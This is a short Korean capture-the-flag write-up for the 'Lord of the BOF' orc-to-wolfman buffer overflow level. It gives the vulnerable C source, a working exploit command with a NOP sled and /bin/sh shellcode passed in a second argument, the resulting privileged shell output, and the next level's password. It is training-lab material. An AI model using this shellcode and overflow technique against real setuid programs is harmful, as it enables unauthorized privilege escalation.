[BOF] orc -> wolfman

wolfman문제입니다.

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

        // buffer hunter

        memset(buffer, 0, 40);

}

argv[1]에 쉘코드를 올리지 못하도록 막혀있습니다. 전 문제에서 사용했던 방법으로 쉘코드를 사용하면 쉽게 해결할수있습니다.

[orc@localhost orc]$ ./wolfman $(python -c 'print "\x90"*44+"\x76\x76\xfe\xbf"') $(python -c 'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80"')

vvþ¿

bash$ id

uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ mu-pass

sh: mu-pass: command not found

bash$ my-pass

euid = 505

love eyuna

bash$